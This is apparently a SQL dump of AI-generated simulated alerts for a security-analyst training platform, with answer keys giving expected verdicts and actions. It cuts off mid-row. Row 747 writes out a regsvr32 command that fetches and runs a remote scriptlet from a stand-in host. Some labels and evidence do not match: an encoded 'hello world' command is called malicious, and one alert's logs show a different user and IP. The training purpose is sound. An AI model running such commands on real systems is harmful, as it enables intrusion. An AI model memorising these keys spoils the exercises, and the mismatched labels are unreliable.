(744, 'Azure AD Privilege Escalation Attempt', 'high', 'Microsoft Sentinel', 'Anomalous activity detected with Azure AD privileges being elevated using a compromised account. The activity was followed by suspicious PowerShell commands.', 'Lateral Movement', 'T1078', 1, 'investigating', 140, '{\"timestamp\":\"2026-01-11T02:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"win-server-2026\",\"command_line\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\"}', '2026-01-10 15:01:29', '2026-02-24 04:20:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Privilege escalation detected with encoded PowerShell indicative of malicious intent.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(745, 'Potential Data Exfiltration via Exposed S3 Bucket', 'high', 'AWS CloudTrail', 'Sensitive data was accessed from an exposed S3 bucket by a foreign IP, suggesting data exfiltration.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:40:12Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.0.2.44\",\"username\":\"s3_data_user\",\"hostname\":\"s3-bucket-123\",\"request_body\":\"GET /sensitive-data.csv HTTP/1.1\"}', '2026-01-10 08:53:05', '2026-03-14 14:54:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized data access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Access to sensitive data file without authorization\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"review_bucket_permissions\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP involved in accessing exposed S3 bucket with sensitive data, indicative of data exfiltration.\"}', 'Expert', 'CLOUD', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(746, 'False Positive: Legitimate User Mistaken for Brute Force Attacker', 'medium', 'Splunk', 'Multiple login failures detected from an internal IP address. Investigation revealed a legitimate user mistyping their password.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:25:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"10.0.1.15\",\"username\":\"jane.doe\",\"hostname\":\"corp-laptop-01\",\"failed_attempts\":12}', '2026-01-09 22:57:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external threat detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate corporate user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures occurred due to user error; no malicious activity detected.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:31:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:30:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:29:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:28:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(747, 'Lateral Movement Detected Using LOLBins within Azure Environment', 'critical', 'Azure Sentinel', 'Suspicious regsvr32.exe execution detected on multiple internal hosts indicating potential lateral movement using LOLBins within Azure VMs.', 'Lateral Movement', 'T1218', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"AzureVM01\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\"}', '2026-01-09 22:34:33', '2026-02-16 18:05:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for executing remote script leveraging regsvr32\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script is indicative of an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.393Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"AzureVM01\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(748, 'Exposed S3 Bucket Detected, Potential Data Exposure', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, which could lead to unauthorized data exposure.', 'Data Exfiltration', 'T1530', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"AWS\",\"username\":\"aws-user\",\"hostname\":\"N/A\",\"request_body\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\"}', '2026-01-11 12:33:53', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP previously reported for suspicious cloud activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"malicious\",\"details\":\"Bucket policy allows public access to all objects\"}}],\"expected_actions\":[\"block_ip\",\"close_bucket_policy\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public access to S3 buckets can expose sensitive data. Immediate action required to close access.\"}', 'Advanced', 'DLP', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.394Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"AWS\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"N/A\\\",\\\"request_body\\\":\\\"{\\\\\\\"Action\\\\\\\":\\\\\\\"s3:GetObject\\\\\\\",\\\\\\\"Resource\\\\\\\":\\\\\\\"arn:aws:s3:::mybucket/*\\\\\\\",\\\\\\\"Effect\\\\\\\":\\\\\\\"Allow\\\\\\\",\\\\\\\"Principal\\\\\\\":\\\\\\\"*\\\\\\\"}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(749, 'Encoded PowerShell Command Execution Detected in GCP', 'critical', 'Google Cloud Security Command Center', 'An encoded PowerShell command was executed on a Google Cloud VM, indicative of possible malicious activity.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"GCP-VM-01\",\"command_line\":\"powershell -enc aGVsbG8gd29ybGQ=\"}', '2026-01-10 13:25:27', '2026-02-16 18:04:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the GCP VM\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are often used to evade detection and execute malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 